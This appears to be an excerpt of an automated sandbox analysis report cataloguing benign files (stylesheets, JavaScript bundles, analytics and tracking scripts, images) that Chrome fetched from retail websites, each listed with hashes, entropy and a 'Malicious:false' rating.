                                                                                                                                                                                    Preview:.shopify-section.cc-apps.section{margin-top:calc(6 * var(--space-unit))}.template-collection .block-section,.template-search .block-section{margin-top:16px;margin-bottom:16px}@media only screen and (max-width: 844px){.template-collection .block-section,.template-search .block-section{padding:0}}[id*=pr-reviewsnippet] div.pr-rating-stars>div.pr-star-v4.pr-star-v4-0-filled{height:15px;width:15px;background-image:url(https://ak1.ostkcdn.com/img/mxc/star-empty.svg)}[id*=pr-reviewsnippet] div.pr-rating-stars>div.pr-star-v4.pr-star-v4-25-filled{height:15px;width:15px;background-image:url(https://ak1.ostkcdn.com/img/mxc/star-25.svg)}[id*=pr-reviewsnippet] div.pr-rating-stars>div.pr-star-v4.pr-star-v4-50-filled{height:15px;width:15px;background-image:url(https://ak1.ostkcdn.com/img/mxc/star-half.svg)}[id*=pr-reviewsnippet] div.pr-rating-stars>div.pr-star-v4.pr-star-v4-75-filled{height:15px;width:15px;background-image:url(https://ak1.ostkcdn.com/img/mxc/star-75.svg)}[id*=pr-reviewsnippet] div.p
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4935), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4935
                                                                                                                                                                                    Entropy (8bit):5.8445652400851875
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUBdHOcYULH:1DY0hf1bT47OIqWb1kdHOnCH
                                                                                                                                                                                    MD5:9469DA92C4E09F5933463A25C745025C
                                                                                                                                                                                    SHA1:43B3A8E1EDAB386A2008C6751FD508DD470F0275
                                                                                                                                                                                    SHA-256:97B4398CF644EB7B63C8AACCE02454BC1F293935D59F7F0C642DBAF8D469F5FB
                                                                                                                                                                                    SHA-512:7A9404DE0935F26F5C02EBB060E616FBC8FE1A97064C79C5895DF3F9632553B46E83F2428C7559417BA2713D30CB29712C6EA5427EF0C3B96DE7A60F8FDE16EB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 800x232, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):52372
                                                                                                                                                                                    Entropy (8bit):7.964131608270753
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:eyWp2YlwUJauR0DSQ9xVSBlQo9574OgO/Oe+Ij5E9jJDdlLth5AUAd0wFf0SLWDv:Lw2m9Jaw0DS5374E5SRlxx40zKu0pZWf
                                                                                                                                                                                    MD5:2F834AD9E0B77F408DEAB4D2C9C5D024
                                                                                                                                                                                    SHA1:778A9A956DA70514A83CC4A927AE11A3A93078F1
                                                                                                                                                                                    SHA-256:5229C468FB9400766BFA3E3FF588FA22ABFDC1B51B578FB36869708E968B9837
                                                                                                                                                                                    SHA-512:ECBAFAF140BD88550C3D40E26A1861FC5EE0250D3B799A6EE4004584CC272106789FE017EB7FE29B9E86F5BF891368AB77385D66F14C4BF11D8CA03E02AEBD8D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100.................... .......................ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}........ .....................................................................................................................................+.l.......Z....C.......@.J.X..%f%M...M%.c.?....`'U.Q%..5.....I....r.............
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1231), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1231
                                                                                                                                                                                    Entropy (8bit):5.2171804506361505
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:fbj78joOLQmepOlgEx3N6JxAU7bXmI2Vy2C5IRlXop:fbPVmQwlgEx3N6JxAK2nA2IX
                                                                                                                                                                                    MD5:A4FD32B8A56760276F77B56B8FF8D9B4
                                                                                                                                                                                    SHA1:B5E47AE3DF51CF81004931A1576CDFEBB41B71AC
                                                                                                                                                                                    SHA-256:362BADC4612E62C3C83A97F2ECA11B3144ED322906C87E3396A1B10A5CAC464B
                                                                                                                                                                                    SHA-512:6885D27D20F4FBAEE5BD1ECCA89D93107F9DE7271E8A30ED1EBC25CF6D5658A72C88990CAE4B5AE1B844805E9AD044932F31C796D8A173E6B03E6A02D0AB1CCD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/homepage/_next/static/chunks/pages/_app-10f1c4b0a781f276.js
                                                                                                                                                                                    Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[888],{2551:function(e,t,r){"use strict";r.r(t);var n=r(9499),o=(r(2747),r(5893));function c(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}t.default=function(e){var t=e.Component,r=e.pageProps;return(0,o.jsx)(t,function(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?c(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):c(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}({},r))}},1118:function(e,t,r){(window.__NEXT_P=window.__NEXT_P||[]).push(["/_app",function(){return r(2551)}])},2747:function(){},9499:function(e,t,r){"use strict";function n(e,t,r){return t in e?Object.defineP
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 440 x 440
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):6690206
                                                                                                                                                                                    Entropy (8bit):7.947691729664757
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:98304:RMGaRG4kJTcRH0L6s54YWtqtfx7Dr1G0Wn6MM79nF+KfpXiLmvo4HJ:RMRG4kJTcRH0L6s54JEyDw1p+4p
                                                                                                                                                                                    MD5:8395849C299D98875A087814185429FF
                                                                                                                                                                                    SHA1:D20A94B65149E1917C961AA11D8FE3B2D8B97029
                                                                                                                                                                                    SHA-256:717050F014418F999C17C20F223C3D3B9D764B04D56FA2F96C6A2F5EA221AF49
                                                                                                                                                                                    SHA-512:EDBBE3A047BC6A917AFF6A311F9DA66D2621F345F2C204224D3332655CF12AB8F4F1CEC147999C62F92242F2746E5CE8E0D62191A117D59511C27845AFB9B815
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a......1.........................."..& #*"..&+:(".).2,(!-,-1)%1*%1+-16I3/%6#C6558=R8..:..;6+=BZ>==@.NA#.A>;AG[B>-C43EFNEIbELbFMbHEAIF3J.\NMUNVlO(]O+TP.bPN6PVhQIDRMHTLFVVQVXXV]tWX<Y _YB_YRPZWq[.j[7q[ar\E<^"l^<a_bG_g~`YVa%.a.xaa\b'ybhuc1ie,.e/.en.g.sg wg#who.h..i.ui&qi3.ilnj.tj..jO^jnTk$uk6.kLulBtlb`lu.m.zm(lmkbnh.nu.o..o..q9.r{.sB.sYisvxt..u6.uycvK.vzzv..w/.w..w.jy'.yomy..y..zH.z..z..{..}..~L.~..~...^..x........@.....`m.D........(..,..:..C........-...l....GL....@(.}t.}........0...n....X.....4........M.....n...........>........D..X..............B..J.....7.......................ls......c................=..1..t...................B..........B@........J/....................PJ................................................................................!..NETSCAPE2.0.....!.......,..................................."..& #*"..&+:(".).2,(!-,-1)%1*%1+-16I3/%6#C6558=R8..:..;6+=BZ>==@.NA#.A>;AG[B>-C43EFNEIbELbFMbHEAIF3J.\NMUNVlO(]O+TP.bPN6PVhQIDRMHTLFVVQVXXV]tWX<Y _YB_YRPZW
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2822
                                                                                                                                                                                    Entropy (8bit):7.269566975983068
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxiWlykHAU9j9s09orjNJxomeTF4+4yZR63s5DoV8BVcF8mkg8:NBIl/XrxicTPorjNrome2+fR63shu4/
                                                                                                                                                                                    MD5:236F8F6280B432C6627268A20123C68B
                                                                                                                                                                                    SHA1:1E83DB811443590E5CA681BB10745AD2FD99610C
                                                                                                                                                                                    SHA-256:7DCD055A4357CE4B9AFBEF89E5F5808D19061D8611F8D0B20F1A2D21956B40E4
                                                                                                                                                                                    SHA-512:8781FCBFA569E367E22555E954A401743FA34798FE78220961B5EC392B91908E90D11A6EF66AF26F565CB907B705D2A95D41458C81A33905591706EB985B9255
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P...................................................................................g...../gI.H.E..T...Rx6.S_l.$L..%...^..jH...V..Q2.$.....^..jH...^...A....{.^.Yj#.U:.h.p.L.....e.k.UN].....d....,I".....EE.X.`.I.D.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5991)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):274912
                                                                                                                                                                                    Entropy (8bit):5.569832648717321
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:lQuwiztGbETravo1y0Z5CptDY8/I8+yU/OUYhcDmKD0C8Gp/36l:BGbg+vovMYGUTx0C8Gp/3S
                                                                                                                                                                                    MD5:2BEA16A5233C87AFB5DD77F614A9A3F6
                                                                                                                                                                                    SHA1:DC938F54172DD775C3EA6D52316CDDAC6DCBC227
                                                                                                                                                                                    SHA-256:FF22912C7BBDAE1529DF998F69107D3031041603C412266605C863D6FBFC31AA
                                                                                                                                                                                    SHA-512:E20E4DE787DB1093B5CDDE0290371A226873B63EA014A1810D2A2B709002E7C696B2212C79B402CEFBA9BFCA8A7FFD520A5083AB087D2E2F49BFA4999643BAA4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_auto_events","priority":21,"vtp_enableScroll":true,"vtp_enableOutboundClick":true,"vtp_enableDownload":true,"vtp_enableHistoryEvents":true,"vtp_enableForm":true,"vtp_enableVideo":true,"vtp_enablePageView":true,"tag_id":9},{"function":"__ogt_cross_domain","priority":21,"vtp_rules":["list","bedbathandbeyond\\.ca$","bedbathandbeyond\\.com$"],"tag_id":11},{"function":"__ogt_ads_datatos","priority":21,"vtp_instanceDestinationId":"AW-1069816607","tag_id":22},{"function":"__ogt_1p_data_v2","priority":11,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CS
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1480x1480, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):194452
                                                                                                                                                                                    Entropy (8bit):7.99895075664234
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:3072:B5O10PfPtMFMVXDDoHm9GnS7csA02HghZywEL909sTRvZ292DuwKrpTQT:Bx1oMVfocZd2HsyFd1Z2EDIrpTA
                                                                                                                                                                                    MD5:F138876282D964232F284DA1AA48CD3A
                                                                                                                                                                                    SHA1:C2FE4983CDBEA00A80481846A6C014C98F8A2090
                                                                                                                                                                                    SHA-256:C2448E9605A1D5CDCC3008DF5F21E398B6E6D6DF28490DA8CDA3195D07D75086
                                                                                                                                                                                    SHA-512:2F23432F6DF9FBD12A65A4CFD1C7D5C622DA1A8398C3A42376AE2E1E3959EA780CA223A7A7B10D36F62AE6EAF287E3FB1B97B5113CA20112DE70DD1F84E448B3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/OSTK-Patio-740X740-2x.jpg
                                                                                                                                                                                    Preview:RIFF....WEBPVP8 ....Pk...*....>.f.O.%..).|....enP..O...F.3....-O.9.p.....a....'..+....*.R...s.....3.O.>......#.../...?..c./...#..........R.N.UP...^...K..:.:.s.{.g._R...j....U...c.60~_._.?.~....u.l.y......}..g.W._.=..P.'..._...~.x.p...z}..X._...}..~..k....\....?......._............._...?.|..Z.y...i.^8h.Xm....t..l"....f.*..7S6.T.W&6.T.U3a.L.ES6.T.U3a.L.ES<..x..>U.5.G#b.........z.Ls.Z.@.V.g@.......:.S6....8.l."#.{.n...`m..Uo.<4..6..... .:..ESAY..K.{;.y.6.eK~s.]?o....n[.'d....LT.]..Q....o...+........s..8z*......k.{;.....6.U.....@.=ZoM..o1!....O..ES4........4..6.ts...p.U ..~..Hi........=.3`~.*t.>0...%..".Q...{.C....i...}.(M...........@.......q......sl...n."..:.S6.T.UM...4x.:.S6.\........K.h..U../.# ..E.tX...eXT5?.....&~`......?...qi.Z.1tq8o.=.......N.-6.jH.%N.$..-c.&.....vS.......... V.g@.f.*.......d.4...o.........e....Y;..g@.v......p.t-..Qh.5.5.....H....x........*b!....e.{C}.@..<. .)p5......6j..=........`...x.:.S6(..../.}.u.}.EN
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (5445)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):5688
                                                                                                                                                                                    Entropy (8bit):5.275576838845491
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:C9cDL0dTOZe8mH9aK7V8f8UifWfPXappfkfpAutsZnVpuLYUgjwgYXg7Xgg0sgKL:C9jOZw3V8LiOnXarsBZt+puLY1jZBslU
                                                                                                                                                                                    MD5:2C555F070DFD23557B66C6CD256BC75E
                                                                                                                                                                                    SHA1:CDAC6F662421DB3D732929611D3E38F6B9507351
                                                                                                                                                                                    SHA-256:F0E5640D66C44D407D5BDE1F0E1808297AAFF94C64946183EE081B4C77DD65CE
                                                                                                                                                                                    SHA-512:011E6DB5CF9D89F6DAF63601DEAC188077EE4D0CFF74934D8DBFAD95A840CEA22D55AC2EF0D8776FB92BF36D64C9F9AB111CD88D3D956FF4DA00DA8B1D344A72
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://prod.accdab.net/beacon/bf/bf.html?v=202009_01
                                                                                                                                                                                    Preview:<html>.<head>. <script type="application/javascript">. /** @license. Uses code from stringencoders. See [(${beacon_domain})]/static/js/uba_opensource_readme.txt for license information.. */. !function(t){"use strict";function e(){var t=Date.now?Date.now():(new Date).getTime();return t||0}function n(t){var e=new XMLHttpRequest;return e.open("post",t,!0),e.setRequestHeader("Content-Type","application/json;charset=UTF-8"),e.overrideMimeType&&e.overrideMimeType("application/json"),e}var r=function(t){var e=function(t){return void 0!==t},n=e(t.Prototype)&&t.Prototype.Version<"1.7"&&e(Array.prototype.toJSON),r=e(Object.toJSON),o=t.JSON&&e(t.JSON.stringify)&&e(t.JSON.parse);return!r&&n?null:o?{stringify:n?Object.toJSON:t.JSON.stringify,parse:function(e){try{return t.JSON.parse(e)}catch(t){return null}}}:null}(t);var o=function(t){if(t.btoa&&t.atob)return{btoa:function(e){return t.btoa(e)},atob:function(e){return t.atob(e)}};var e=function(t,e){var n=o.ALPHA.indexOf(t.charAt(e));if(-1
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2200
                                                                                                                                                                                    Entropy (8bit):6.936597653179103
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxuAQiDWGKomTYmLtkIQD5kkiWt:NBIl/XrxxQoKo89oDMWt
                                                                                                                                                                                    MD5:B5C72B1C3776B59F8A8B207C80B17DB0
                                                                                                                                                                                    SHA1:28E5C7CA4E939C058116E18F7C4CC4CC17C88ADE
                                                                                                                                                                                    SHA-256:159338B5B0B2B4686E7D9B1E7A7D38D80346D9E2F9C6F08544ABD9AC83C6B1BF
                                                                                                                                                                                    SHA-512:C6B5AE7842866696CDA8D34C638407A66FA7BD4767E7179684B5890FEB71FA655F6AB9BA7E4B74B90CCC81B9AD158650817AC39082AB301FE8619DEF9C92A683
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P........................................................................................0....6.Km.YS-...f....zg..|%O3d""$..z........(s~......:.LS.t/lx.^z....'.Z..:n.]9.=I..<Z..*L.[.n...ks...:g5..:.s~............9..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):121
                                                                                                                                                                                    Entropy (8bit):4.772163314390804
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3://OYpNXDQNIYUqBiIYjfSyYzLvxRKC:3Pj0NJUTJKx
                                                                                                                                                                                    MD5:D8C268E7C3CF2A526CCA6CF68DAA5B4E
                                                                                                                                                                                    SHA1:7396FEBA9C82D8D572744C5CBBF7ABC864849B67
                                                                                                                                                                                    SHA-256:CFA5FE1780028DCD88EF9087303662301D5F27F96527B41E11334919B071B32D
                                                                                                                                                                                    SHA-512:22668BC067449A6C45D58D26A044BAB447ACDA7A8DE1CE876BB33965ABE1B1108E0FD4434E9A01EF7F751A4BFC5AE2D534B8F3D76409FCB2BDB43C153835372B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/ShopPayLoginLoader.CjGSo8kt.css
                                                                                                                                                                                    Preview:._5Z70J{border-radius:var(--x-global-border-radius, var(--x-border-radius-base));display:flex;flex:1}.oSdnC{margin:auto}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):33483
                                                                                                                                                                                    Entropy (8bit):3.8154404016293837
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:LR2dMhepRHzIGHSoZzQk79ydGRsKsXENJGZ8rqjPATxR5RsKsXENJGZ8rqjPATx/:LRRezzIIRydHXkSATx6XkSATxPH
                                                                                                                                                                                    MD5:05B3D80ABB45502FA4560A8A6EF0246E
                                                                                                                                                                                    SHA1:9F3D5FA4DB10C44683125C061FC5BEB0D491DECE
                                                                                                                                                                                    SHA-256:E82C7BE21012F80D2E33B095DE60F2A229AECDE0CA28F0B14EEDC58605B995F6
                                                                                                                                                                                    SHA-512:A11E1042A40AAFCDDE1E01FF2CBC908008D7943C3287FB4FC07CA852BAAC03EE92A2816A81AC1DE390A01BDBE9DE221D9D4838D0F10E8EA7D3046441F47246E9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/10282024-MOPS-COOP-v2-A3-DSK_.svg
                                                                                                                                                                                    Preview:<svg width="805" height="447" viewBox="0 0 805 447" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_3048_9465)">.<path d="M71.6744 239.794H52.5088V205.971C52.5088 205.615 52.2178 205.324 51.8603 205.324H49.6486C49.291 205.324 49 205.615 49 205.971V241.022C49 241.378 49.291 241.669 49.6486 241.669H71.6744C72.0319 241.669 72.323 241.378 72.323 241.022V240.441C72.323 240.084 72.0319 239.794 71.6744 239.794Z" fill="#10595B"/>.<path d="M79.9308 205.324H82.1425C82.5 205.324 82.7911 205.615 82.7911 205.971V241.022C82.7911 241.378 82.5 241.669 82.1425 241.669H79.9308C79.5732 241.669 79.2822 241.378 79.2822 241.022V205.971C79.2822 205.615 79.5732 205.324 79.9308 205.324Z" fill="#10595B"/>.<path d="M122.527 205.623C122.411 205.432 122.203 205.324 121.979 205.324H121.338C121.089 205.324 120.856 205.474 120.748 205.706L106.788 236.036L93.5089 205.714C93.4091 205.482 93.168 205.324 92.9102 205.324H90.5322C90.316 205.324 90.1081 205.432 89.9917 205.615C89.867 205.797 89.8504
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (32117)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):51984
                                                                                                                                                                                    Entropy (8bit):5.4192491243703405
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:JIF0sxaJJciEVY+7ODTPLhRM8WVQpESqQKsxtLQzavRsLadl0W8M5F4H:ahItZrMRWpEWHQKiqKH
                                                                                                                                                                                    MD5:DB49357F923EC899C9EF90B7DEF907B8
                                                                                                                                                                                    SHA1:480D28152D77EAB20F5992EC0AB5AF15960FFC91
                                                                                                                                                                                    SHA-256:80E528BE853EAC23AF2454534897CA9536B1D3D04AA043B042F34879A3C111C8
                                                                                                                                                                                    SHA-512:88607E0B9619FA59D47B036F0BDF571CD996701774BD7AAF075B63C38590FFD6315551CF361126D4F7E5379A6D635FE3C11283D9560419040254CD217BC544ED
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/shopifycloud/shopify/assets/shopify_pay/storefront-80e528be853eac23af2454534897ca9536b1d3d04aa043b042f34879a3c111c8.js?v=20220906
                                                                                                                                                                                    Preview:!function(){var t=function(t){var e={exports:{}};return t.call(e.exports,e,e.exports),e.exports},e=function(t){return function(){var e=t.apply(this,arguments);return new Promise((function(t,r){function n(i,o){try{var a=e[i](o),s=a.value}catch(t){return void r(t)}if(!a.done)return Promise.resolve(s).then((function(t){n("next",t)}),(function(t){n("throw",t)}));t(s)}return n("next")}))}},r=function(t){return t&&t.__esModule?t:{default:t}},n=t((function(t){var e={}.toString;t.exports=function(t){return e.call(t).slice(8,-1)}})),i=t((function(t){var e=t.exports="undefined"!=typeof window&&window.Math==Math?window:"undefined"!=typeof self&&self.Math==Math?self:Function("return this")();"number"==typeof __g&&(__g=e)})),o=t((function(t){var e="__core-js_shared__",r=i[e]||(i[e]={});t.exports=function(t){return r[t]||(r[t]={})}})),a=t((function(t){var e=0,r=Math.random();t.exports=function(t){return"Symbol(".concat(void 0===t?"":t,")_",(++e+r).toString(36))}})),s=t((function(t){var e=o("wks"),r=
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (52360)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):349823
                                                                                                                                                                                    Entropy (8bit):5.4181183321056725
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:8JV0gSqdzJ3IZoOkn+gs29IlIoL+kyqAfN+Th3dFTUOQeyePEMuDZjUX1YkE/L4F:8JV06+gs29UIoL+kFAfg9dFTU9ecu/
                                                                                                                                                                                    MD5:67F88B2D9812BB2687A28FF0FAD579D6
                                                                                                                                                                                    SHA1:EE940479B2456259831C880B80406E5099D8C434
                                                                                                                                                                                    SHA-256:15BB0889AD69CBC01DCE2D9A2DF36BE01B6AE97E0E57510DCA89A56D095BF0D5
                                                                                                                                                                                    SHA-512:403D726407F12132003D6AF1743A5B5CC682D520F6D637DF4EFC8708BDAB5B7B153444D06175E33A540152101DC957CECE23C909E7EB89E1DDB973DAB3A21F75
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://analytics.tiktok.com/i18n/pixel/static/main.MTJhNGMzN2YwMQ.js
                                                                                                                                                                                    Preview:!function(){"use strict";function t(){t=function(){return e};var e={},r=Object.prototype,n=r.hasOwnProperty,o="function"==typeof Symbol?Symbol:{},i=o.iterator||"@@iterator",a=o.asyncIterator||"@@asyncIterator",c=o.toStringTag||"@@toStringTag";function u(t,e,r){return Object.defineProperty(t,e,{value:r,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{u({},"")}catch(t){u=function(t,e,r){return t[e]=r}}function l(t,e,r,n){var o=e&&e.prototype instanceof p?e:p,i=Object.create(o.prototype),a=new I(n||[]);return i._invoke=function(t,e,r){var n="suspendedStart";return function(o,i){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===o)throw i;return T()}for(r.method=o,r.arg=i;;){var a=r.delegate;if(a){var c=g(a,r);if(c){if(c===s)continue;return c}}if("next"===r.method)r.sent=r._sent=r.arg;else if("throw"===r.method){if("suspendedStart"===n)throw n="completed",r.arg;r.dispatchException(r.arg)}else"return"===r.method&&r.abrupt("return",r.arg);
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1744)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1745
                                                                                                                                                                                    Entropy (8bit):5.253555913736168
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:wIxHD3eg1IXqunCfAk7qG4on6nxixxE/FcyjJQaasac:igO6nmG4RgxxE/FcUuaH1
                                                                                                                                                                                    MD5:68A58F1DFFB0F5EFB38A62FA10D09750
                                                                                                                                                                                    SHA1:F7D665750D42CA2379107BCD38C66A9D7C827B08
                                                                                                                                                                                    SHA-256:89691081EB34FF86B02558A6F8AD149BEC8E19EA166B89BD7281F4FF713C65DE
